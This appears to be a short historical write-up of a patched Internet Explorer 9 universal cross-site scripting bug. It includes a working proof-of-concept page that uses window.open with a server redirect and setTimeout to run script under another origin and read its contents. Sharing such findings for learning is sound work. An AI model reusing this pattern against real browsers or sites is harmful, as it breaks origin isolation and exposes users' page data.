IE9 UXSS: window.open Redirect with setTimeout Code Execution

I was lucky to find this one early in my IE9 research. The idea is straightforward: open a new window that will redirect to a target domain, and simultaneously schedule a setTimeout against that window before the redirect happens. The timer fires in the context of the final destination, giving full script access to it.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9" />
</head>
<body>
<script language="JavaScript">
function main()
{
    var win = window.open("redirect.aspx");
    win.setTimeout("alert('Click OK when Google is loaded...');alert(document.URL + '\n\n' + document.body.innerText)");
}
</script>
<input type="button" onclick="main()" value="Open window and inject code!">
</body>
</html>

The redirect.aspx file issues a server-side redirect to the target URL. Because setTimeout is registered against the window object before the redirect completes, the script string is retained and eventually executed under the target origin. This is a classic UXSS pattern — the origin check happens at call time but the scheduled callback inherits the redirected context.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.